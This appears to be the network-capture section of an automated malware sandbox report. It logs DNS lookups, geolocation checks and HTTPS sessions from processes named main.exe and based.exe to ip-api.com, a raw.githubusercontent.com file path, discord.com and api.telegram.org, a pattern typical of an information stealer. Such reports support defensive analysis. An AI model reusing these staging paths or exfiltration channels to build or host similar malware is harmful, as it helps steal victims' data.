                                                                                                                                                          May 9, 2024 17:47:40.049036980 CEST49718443192.168.2.5185.199.108.133
                                                                                                                                                          May 9, 2024 17:47:40.054616928 CEST49718443192.168.2.5185.199.108.133
                                                                                                                                                          May 9, 2024 17:47:40.054641008 CEST44349718185.199.108.133192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:40.054896116 CEST44349718185.199.108.133192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:40.165452957 CEST49718443192.168.2.5185.199.108.133
                                                                                                                                                          May 9, 2024 17:47:40.208127022 CEST44349718185.199.108.133192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:40.482240915 CEST44349718185.199.108.133192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:40.482347012 CEST44349718185.199.108.133192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:40.482929945 CEST49718443192.168.2.5185.199.108.133
                                                                                                                                                          May 9, 2024 17:47:40.488842964 CEST49718443192.168.2.5185.199.108.133
                                                                                                                                                          May 9, 2024 17:47:44.666145086 CEST4971680192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:48:13.972594023 CEST4973980192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:48:14.125066042 CEST8049739208.95.112.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:14.125196934 CEST4973980192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:48:14.125292063 CEST4973980192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:48:14.336010933 CEST8049739208.95.112.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:14.414586067 CEST8049739208.95.112.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:14.476172924 CEST4973980192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:48:14.955830097 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:14.955851078 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:14.955940008 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:14.981659889 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:14.981678963 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.295559883 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.299536943 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.299551964 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.300623894 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.300714970 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.301388979 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.301460981 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.320909977 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.320916891 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.320981979 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321008921 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321125031 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321156025 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321300983 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321335077 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321491003 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321506023 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321633101 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321647882 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321665049 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321671009 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321683884 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321695089 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321749926 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321762085 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.321778059 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321799040 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321810961 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321923971 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.321945906 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.368117094 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.369259119 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369277000 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369323969 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369323969 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369342089 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.369358063 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.416115999 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.418930054 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.418951035 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.418966055 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.418982029 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.418992996 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.419035912 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.460118055 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.469182968 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469207048 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469222069 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469233990 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469249964 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469286919 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469337940 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469357014 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469409943 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.469424009 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.512115955 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.512298107 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.513039112 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.513053894 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.556116104 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.626804113 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.626971960 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.626990080 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.627098083 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:15.627134085 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.627206087 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.779891968 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:15.933403969 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.635812044 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.635902882 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.635931015 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.635978937 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:16.636002064 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.636013985 CEST44349742162.159.138.232192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.636053085 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:16.639477968 CEST49742443192.168.2.5162.159.138.232
                                                                                                                                                          May 9, 2024 17:48:16.800790071 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:16.800801039 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.800889015 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:16.846529007 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:16.846549988 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.465543032 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.466062069 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.466078043 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.467243910 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.467363119 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.476859093 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.476942062 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477196932 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477211952 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477260113 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477274895 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477375031 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477411985 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477530956 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477560997 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477667093 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477689981 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477709055 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477718115 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477735043 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477745056 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477757931 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477765083 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477816105 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477827072 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477847099 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477857113 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477900982 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477910042 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477916002 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477942944 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477952003 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477966070 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477972031 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477992058 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478001118 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478060007 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478070974 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478084087 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478094101 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478111982 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478120089 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478179932 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478188038 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478209972 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478219986 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478236914 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478245020 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478260040 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478266001 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478279114 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478336096 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478357077 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478377104 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478399038 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478425026 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478439093 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478456020 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478490114 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478490114 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478535891 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524112940 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524383068 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524399996 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524422884 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524431944 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524450064 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524456024 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524468899 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524478912 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524506092 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524516106 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524523973 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524528027 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524544001 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524549007 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524564028 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524571896 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524590015 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524600029 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.524615049 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524655104 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524677992 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524730921 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.524736881 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.568116903 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:21.900530100 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:21.900568962 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:21.900686026 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:21.900712967 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:21.900752068 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:21.903342962 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:21.903949022 CEST4973980192.168.2.5208.95.112.1
                                                                                                                                                          May 9, 2024 17:48:22.056371927 CEST8049739208.95.112.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:22.056499004 CEST4973980192.168.2.5208.95.112.1

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          May 9, 2024 17:47:34.751317024 CEST5983053192.168.2.51.1.1.1
                                                                                                                                                          May 9, 2024 17:47:34.905184031 CEST53598301.1.1.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:47:39.557771921 CEST5167753192.168.2.51.1.1.1
                                                                                                                                                          May 9, 2024 17:47:39.711019039 CEST53516771.1.1.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:13.815393925 CEST5920653192.168.2.51.1.1.1
                                                                                                                                                          May 9, 2024 17:48:13.970136881 CEST53592061.1.1.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:14.800735950 CEST5353453192.168.2.51.1.1.1
                                                                                                                                                          May 9, 2024 17:48:14.955051899 CEST53535341.1.1.1192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:16.646933079 CEST5600153192.168.2.51.1.1.1
                                                                                                                                                          May 9, 2024 17:48:16.799998999 CEST53560011.1.1.1192.168.2.5

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          May 9, 2024 17:47:34.751317024 CEST192.168.2.51.1.1.10x7f4eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:47:39.557771921 CEST192.168.2.51.1.1.10xf682Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:13.815393925 CEST192.168.2.51.1.1.10x7390Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:14.800735950 CEST192.168.2.51.1.1.10x599eStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:16.646933079 CEST192.168.2.51.1.1.10xf9b9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          May 9, 2024 17:47:34.905184031 CEST1.1.1.1192.168.2.50x7f4eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:47:39.711019039 CEST1.1.1.1192.168.2.50xf682No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:47:39.711019039 CEST1.1.1.1192.168.2.50xf682No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:47:39.711019039 CEST1.1.1.1192.168.2.50xf682No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:47:39.711019039 CEST1.1.1.1192.168.2.50xf682No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:13.970136881 CEST1.1.1.1192.168.2.50x7390No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:14.955051899 CEST1.1.1.1192.168.2.50x599eNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:14.955051899 CEST1.1.1.1192.168.2.50x599eNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:14.955051899 CEST1.1.1.1192.168.2.50x599eNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:14.955051899 CEST1.1.1.1192.168.2.50x599eNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:14.955051899 CEST1.1.1.1192.168.2.50x599eNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                          May 9, 2024 17:48:16.799998999 CEST1.1.1.1192.168.2.50xf9b9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • raw.githubusercontent.com
                                                                                                                                                          • discord.com
                                                                                                                                                          • api.telegram.org
                                                                                                                                                          • ip-api.com

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.549716208.95.112.1807796C:\ProgramData\main.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          May 9, 2024 17:47:35.148781061 CEST65OUTGET /json/ HTTP/1.1
                                                                                                                                                          Host: ip-api.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          May 9, 2024 17:47:35.301635027 CEST482INHTTP/1.1 200 OK
                                                                                                                                                          Date: Thu, 09 May 2024 15:47:34 GMT
                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                          Content-Length: 305
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Ttl: 60
                                                                                                                                                          X-Rl: 44
                                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 43 41 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 22 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 22 7a 69 70 22 3a 22 39 30 30 36 30 22 2c 22 6c 61 74 22 3a 33 34 2e 30 35 34 34 2c 22 6c 6f 6e 22 3a 2d 31 31 38 2e 32 34 34 31 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 43 64 6e 37 37 20 4c 41 58 20 43 53 32 22 2c 22 61 73 22 3a 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 34 35 2e 31 31 30 22 7d
                                                                                                                                                          Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"CA","regionName":"California","city":"Los Angeles","zip":"90060","lat":34.0544,"lon":-118.2441,"timezone":"America/Los_Angeles","isp":"Datacamp Limited","org":"Cdn77 LAX CS2","as":"AS60068 Datacamp Limited","query":"84.17.45.110"}


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.549739208.95.112.1804292C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          May 9, 2024 17:48:14.125292063 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                          Host: ip-api.com
                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                          User-Agent: python-urllib3/2.2.1
                                                                                                                                                          May 9, 2024 17:48:14.414586067 CEST372INHTTP/1.1 200 OK
                                                                                                                                                          Date: Thu, 09 May 2024 15:48:13 GMT
                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                          Content-Length: 195
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Ttl: 21
                                                                                                                                                          X-Rl: 43
                                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 22 72 65 76 65 72 73 65 22 3a 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 35 2d 31 31 30 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 74 72 75 65 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 34 35 2e 31 31 30 22 7d
                                                                                                                                                          Data Ascii: {"status":"success","country":"United States","regionName":"California","timezone":"America/Los_Angeles","reverse":"unn-84-17-45-110.cdn77.com","mobile":false,"proxy":true,"query":"84.17.45.110"}


                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.549718185.199.108.1334437796C:\ProgramData\main.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-05-09 15:47:40 UTC108OUTGET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-05-09 15:47:40 UTC901INHTTP/1.1 200 OK
                                                                                                                                                          Connection: close
                                                                                                                                                          Content-Length: 38
                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          ETag: "937f0d2f7dc6042a15459e7058c0a2c30a4d13dff2b555d7421546908fb2234f"
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          X-GitHub-Request-Id: 54E8:10BA36:26F57CF:291BFAC:663CF01B
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Date: Thu, 09 May 2024 15:47:40 GMT
                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                          X-Served-By: cache-lax-kwhp1940139-LAX
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          X-Cache-Hits: 0
